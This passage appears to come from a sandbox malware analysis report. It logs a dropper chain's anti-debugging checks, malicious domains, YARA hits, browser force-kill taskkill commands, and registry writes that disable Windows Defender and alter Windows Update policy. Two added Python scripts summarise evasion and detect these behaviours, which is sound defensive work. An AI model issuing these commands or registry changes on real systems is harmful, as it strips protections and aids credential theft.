Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Code function: 3_2_05030424 rdtsc 3_2_05030424
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Code function: 6_2_00A9B7B2 LdrInitializeThunk, 6_2_00A9B7B2
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Memory protected: page guard
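The sandbox-evasion listing above (thread sleeps against the -30000s threshold, WMI Win32_BIOS queries, the VBOX__ ACPI table name) and this Anti Debugging section are one line per observed event; for triage it is more useful to roll them up per dropped executable. The Python script below is an added example, not part of the report or of Joe Sandbox, that parses exactly this line format and summarises the evasion techniques each process uses. Two assumptions: the sleep figures are milliseconds despite the 's' suffix (the '-180000s' sleep and the 'delay time: 180000' line for skotes.exe agree on that), and 922337203685477 is INT64_MAX/10000, a relative wait that never expires, which the script reports as an infinite wait rather than as sleep time. The sample lines are copied from this section, two of them still carrying the 'Jump to behavior' link label that the HTML export appends. The 'Hyper-V RAW' strings on several lines are the Winsock protocol name of the Hyper-V socket provider and turn up in ordinary processes that enumerate the protocol catalogue, so the script does not treat them as evidence.

```python
"""Per-process evasion summary from Joe Sandbox 'Source:' lines.  Added example, not part of the
report or of Joe Sandbox.  Sleep figures are read as milliseconds despite the 's' suffix: an
assumption, but one the '-180000s' sleep and the 'delay time: 180000' line for skotes.exe agree on."""
import re
from collections import defaultdict
from dataclasses import dataclass, field

INFINITE_MS = 922_337_203_685_477  # INT64_MAX // 10_000: a relative NT wait that never expires
SLEEP_THRESHOLD_MS = 30_000        # the '>= -30000s' cut-off printed in the report
SLEEP_TIME_RE = re.compile(r"Thread sleep time:\s*-(\d+)s")
SLEEP_COUNT_RE = re.compile(r"Thread sleep count:\s*(\d+)")
DELAY_RE = re.compile(r"Thread delayed: delay time:\s*(\d+)")
WINDOW_RE = re.compile(r"Open window title or class name:\s*(.+)$")
FILE_RE = re.compile(r"File opened:\s*(\S+)$")
ANALYSIS_TOOL_WINDOWS = {"regmonclass", "filemonclass", "procmon_window_class", "ollydbg", "gbdyllo"}
SOFTICE_DEVICES = {"NTICE", "SICE", "SIWVID"}  # SoftICE driver names; old packers still probe them
SUBSTRING_MARKERS = [  # (text in the report line, technique it evidences)
    ("Thread information set: HideFromDebugger", "NtSetInformationThread(ThreadHideFromDebugger)"),
    ("Process queried: DebugPort", "NtQueryInformationProcess(ProcessDebugPort)"),
    (" rdtsc ", "rdtsc timing check"),
    ("HARDWARE\\ACPI\\DSDT\\VBOX__", "VirtualBox ACPI table lookup"),
    ("SELECT * FROM Win32_BIOS", "WMI BIOS enumeration"),
    ("SELECT * FROM AntiVirusProduct", "WMI AV product enumeration"),
]


@dataclass
class ProcessEvasion:
    sleep_ms: int = 0          # sum of 'Thread sleep time' over all threads (finite waits only)
    sleep_calls: int = 0       # sum of 'Thread sleep count'
    infinite_wait: bool = False
    techniques: set = field(default_factory=set)


def process_name(source_token: str) -> str:
    """'C:\\...\\skotes.exe' or 'skotes.exe,' (first item of a dump list) -> 'skotes.exe'."""
    return source_token.rstrip(",").rsplit("\\", 1)[-1]


def parse_report(lines):
    procs = defaultdict(ProcessEvasion)
    for raw in lines:
        line = raw.strip().replace(" Jump to behavior", "")  # link label the HTML export appends
        if not line.startswith("Source:"):
            continue
        body = line[len("Source:"):].strip()
        pe = procs[process_name(body.split()[0])]
        if m := SLEEP_TIME_RE.search(body):
            ms = int(m.group(1))
            pe.infinite_wait |= ms >= INFINITE_MS
            pe.sleep_ms += 0 if ms >= INFINITE_MS else ms
        if m := SLEEP_COUNT_RE.search(body):
            pe.sleep_calls += int(m.group(1))
        if m := DELAY_RE.search(body):  # distinct delay values; not added to the per-thread total
            pe.infinite_wait |= int(m.group(1)) >= INFINITE_MS
        for needle, technique in SUBSTRING_MARKERS:
            if needle in body:
                pe.techniques.add(technique)
        if m := WINDOW_RE.search(body):
            name = m.group(1).strip().lower()
            if name in ANALYSIS_TOOL_WINDOWS or "sysinternals" in name:
                pe.techniques.add("window-name scan for analysis tools")
        if (m := FILE_RE.search(body)) and m.group(1) in SOFTICE_DEVICES:
            pe.techniques.add("SoftICE device probe")
    return dict(procs)


def summarize(procs):
    """{process: [finding, ...]} for every process with at least one finding."""
    out = {}
    for name, pe in procs.items():
        findings = sorted(pe.techniques)
        if pe.sleep_ms >= SLEEP_THRESHOLD_MS:
            findings.append(f"sleeps {pe.sleep_ms / 1000:.0f}s over {pe.sleep_calls} calls")
        if pe.infinite_wait:
            findings.append("infinite wait (INT64_MAX relative timeout)")
        if findings:
            out[name] = findings
    return out


SAMPLE_LINES = [  # copied from this section of the report
    r"Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5704 Thread sleep count: 1227 > 30 Jump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5704 Thread sleep time: -2455227s >= -30000s Jump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1128 Thread sleep time: -180000s >= -30000s",
    r"Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000",
    r"Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe TID: 5204 Thread sleep time: -922337203685477s >= -30000s",
    r"Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS",
    r"Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger",
    r"Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort",
    r"Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Code function: 3_2_05030424 rdtsc 3_2_05030424",
    r"Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Open window title or class name: ollydbg",
    r"Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe File opened: SICE",
    r"Source: skotes.exe, skotes.exe, 00000005.00000002.2404972213.000000000097E000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__",
]

if __name__ == "__main__":
    for name, findings in summarize(parse_report(SAMPLE_LINES)).items():
        print(name, *findings, sep="\n  - ")
```

Feeding the whole report text through `parse_report` gives one record per dropped executable; the per-thread totals are what matter for skotes.exe (five worker threads each sleeping roughly two seconds at a time, over a thousand times), whereas the INT64_MAX waits in 1USEAVXFST1CCUTT4RKEBB0FQ1.exe and M0SHVBI03XTU9LNHD2O8UA8TC8F.exe are threads parked forever, not timing evasion.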

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: 9NWW1UIUAOJA8NFOZHWEDA.exe PID: 1340, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ef2532c0b1.exe PID: 1016, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\num[1].exe, type: DROPPED
Source: file.exe, 00000000.00000003.2114509876.0000000004C80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: clearancek.site
Source: file.exe, 00000000.00000003.2114509876.0000000004C80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: licendfilteo.site
Source: file.exe, 00000000.00000003.2114509876.0000000004C80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: spirittunek.store
Source: file.exe, 00000000.00000003.2114509876.0000000004C80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: bathdoomgaz.store
Source: file.exe, 00000000.00000003.2114509876.0000000004C80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: studennotediw.store
Source: file.exe, 00000000.00000003.2114509876.0000000004C80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: dissapoiznw.store
Source: file.exe, 00000000.00000003.2114509876.0000000004C80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: eaglepawnoy.store
Source: file.exe, 00000000.00000003.2114509876.0000000004C80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: mobbipenju.store
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe "C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe "C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe "C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001229001\num.exe "C:\Users\user\AppData\Local\Temp\1001229001\num.exe"
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: 90bef5afae.exe, 0000000E.00000000.3036690309.00000000006D2000.00000002.00000001.01000000.00000011.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: ST44OD0PMG8MCMYJRN4.exe, ST44OD0PMG8MCMYJRN4.exe, 00000003.00000002.2368194252.000000000031E000.00000040.00000001.01000000.00000006.sdmp, skotes.exe, skotes.exe, 00000005.00000002.2404972213.000000000097E000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: OkProgram Manager
Source: ef2532c0b1.exe, ef2532c0b1.exe, 0000000C.00000002.3013331115.0000000000421000.00000040.00000001.01000000.00000010.sdmp Binary or memory string: Program Manager
Source: firefox.exe, 0000001B.00000002.3257115436.0000004BF73FB000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: ?Progman
Source: 26e226f915.exe, 0000000B.00000002.2902860466.0000000000A62000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: 9Program Manager
Source: M0SHVBI03XTU9LNHD2O8UA8TC8F.exe, 00000006.00000002.2505966124.0000000000C6F000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: 3Program Manager
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001229001\num.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001229001\num.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Registry value created: TamperProtection 0
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations
Source: file.exe, 00000000.00000003.2214786927.0000000005737000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 26e226f915.exe, 0000000D.00000003.3165945579.000000000169A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
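The taskkill lines in the HIPS / PFW / Operating System Protection Evasion section (90bef5afae.exe force-killing firefox, chrome, msedge, opera and brave, twice over) and the Defender and Windows Update policy writes listed above are the two behaviours in this report that endpoint telemetry can alert on without any malware-specific signature. The Python detector below is an added example, not part of the report or of Joe Sandbox. It runs over constructed records in the shape of Sysmon Event ID 13 (registry SetValue) and Event ID 1 (process creation), with field names as Sysmon logs them and image paths, value names and command lines taken from the report. Two details are not in the report and are assumed: the key under which TamperProtection was written (set here to HKLM\SOFTWARE\Microsoft\Windows Defender\Features) and the DWORD data written to the WindowsUpdate values, so that rule fires on any write to those value names under the policy key.

```python
"""Alerts for the Defender/Windows Update policy writes and the browser-kill sequence in this report.
Added example, not part of the report or of Joe Sandbox.  Records below are constructed in the shape
of Sysmon Event ID 13 (registry SetValue) and Event ID 1 (process creation) with values from the report."""
import re
from collections import defaultdict

BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "opera.exe", "brave.exe"}
TASKKILL_RE = re.compile(r"taskkill\s+/F\s+/IM\s+(\S+)\s+/T", re.IGNORECASE)
DWORD_RE = re.compile(r"DWORD \(0x([0-9A-Fa-f]{8})\)")   # Sysmon renders DWORD data this way
WU_POLICY = r"\Policies\Microsoft\Windows\WindowsUpdate"
DEFENDER_RULES = {  # value name -> (data that removes the protection, description)
    "DisableRealtimeMonitoring": (1, "real-time scanning disabled"),
    "DisableIOAVProtection": (1, "download and attachment scanning disabled"),
    "DisableNotifications": (1, "Security Center notifications suppressed"),
    "TamperProtection": (0, "tamper protection disabled"),
}
WU_VALUES = {"AUOptions", "AutoInstallMinorUpdates", "DoNotConnectToWindowsUpdateInternetLocations"}


def dword(details):
    """'DWORD (0x00000001)' -> 1; None for non-DWORD data."""
    m = DWORD_RE.search(details or "")
    return int(m.group(1), 16) if m else None


def check_registry(ev):
    """Event ID 13: alert text, or None.  On a live host also exclude Defender's own components and
    Group Policy processing as writers, since both legitimately touch these keys."""
    key, _, value = ev["TargetObject"].rpartition("\\")
    if value in DEFENDER_RULES and "Windows Defender" in key:
        bad, desc = DEFENDER_RULES[value]
        if dword(ev.get("Details")) == bad:
            return f"{ev['Image']}: {desc} ({value}={bad})"
    if value in WU_VALUES and WU_POLICY in key:   # the report shows the write, not the data
        return f"{ev['Image']}: Windows Update policy changed ({value})"
    return None


def check_browser_kills(events, min_browsers=3):
    """Event ID 1: one parent force-killing several distinct browsers via taskkill."""
    killed = defaultdict(set)
    for ev in events:
        if ev["EventID"] != 1 or not ev["Image"].lower().endswith("\\taskkill.exe"):
            continue
        m = TASKKILL_RE.search(ev["CommandLine"])
        if m and m.group(1).lower() in BROWSERS:
            killed[ev["ParentImage"]].add(m.group(1).lower())
    return [f"{parent}: force-killed {len(names)} browsers {sorted(names)} (credential-flush pattern)"
            for parent, names in killed.items() if len(names) >= min_browsers]


def detect(events):
    alerts = []
    for ev in events:
        if ev["EventID"] == 13:
            alert = check_registry(ev)
            if alert:
                alerts.append(alert)
    alerts.extend(check_browser_kills(events))
    return alerts


# Constructed records.  Image/parent paths and value names come from the report; the TamperProtection
# key path and the DWORD data for the WindowsUpdate value are not in the report and are assumed.
M0 = r"C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe"
AUTOIT = r"C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe"
TASKKILL = r"C:\Windows\SysWOW64\taskkill.exe"
DEF_RTP = r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"


def reg(image, target, data):
    return {"EventID": 13, "Image": image, "TargetObject": target, "Details": f"DWORD (0x{data:08x})"}


def proc(parent, image, cmd):
    return {"EventID": 1, "ParentImage": parent, "Image": image, "CommandLine": cmd}


SAMPLE_EVENTS = [
    reg(M0, DEF_RTP + r"\DisableRealtimeMonitoring", 1),
    reg(M0, DEF_RTP + r"\DisableIOAVProtection", 1),
    reg(M0, r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications", 1),
    reg(M0, r"HKLM\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection", 0),
    reg(M0, r"HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\AUOptions", 1),
    reg(r"C:\Windows\System32\svchost.exe", DEF_RTP + r"\DisableRealtimeMonitoring", 0),  # re-enables: no alert
] + [proc(AUTOIT, TASKKILL, f"taskkill /F /IM {b} /T") for b in sorted(BROWSERS)] + [
    proc(r"C:\Windows\explorer.exe", TASKKILL, "taskkill /F /IM notepad.exe /T"),         # single kill: no alert
]

if __name__ == "__main__":
    print(*detect(SAMPLE_EVENTS), sep="\n")
```

The registry rule matches on the value name and the data that removes the protection, so a write that re-enables real-time monitoring (the svchost record) stays silent; on a live host, key the Windows Update rule on writers other than Group Policy processing, and treat three or more distinct browsers force-killed by one parent as already unusual outside an uninstaller.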

Stealing of Sensitive Information

Source: Yara match File source: 37.2.J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.skotes.exe.790000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.ST44OD0PMG8MCMYJRN4.exe.130000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.2368072745.0000000000131000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.3296905401.0000000004AC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2327332998.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2733867471.0000000004F50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2404867306.0000000000791000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.2364334996.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.3339391328.0000000000821000.00000040.00000001.01000000.0000001D.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.3097542418.000000000135F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 90bef5afae.exe PID: 5204, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: file.exe PID: 7160, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 26e226f915.exe PID: 4020, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 26e226f915.exe PID: 6764, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 39.2.num.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.0.num.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 39.0.num.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.9NWW1UIUAOJA8NFOZHWEDA.exe.4a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.ef2532c0b1.exe.40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.num.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.ef2532c0b1.exe.40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001F.00000002.3104366518.0000000000181000.00000080.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.3089240746.0000000000181000.00000080.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3013087261.0000000000041000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.3176264555.00000000049F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2972676425.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2408818591.00000000004A1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.3340338956.0000000001097000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.3222497122.0000000000041000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.3230829652.0000000000C9B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.3113201257.000000000129E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2368421842.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.3324835217.0000000004A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3014293851.000000000159E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.3337452066.0000000000181000.00000080.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000000.3322904939.0000000000181000.00000080.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2416316812.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 9NWW1UIUAOJA8NFOZHWEDA.exe PID: 1340, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ef2532c0b1.exe PID: 1016, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\num[1].exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
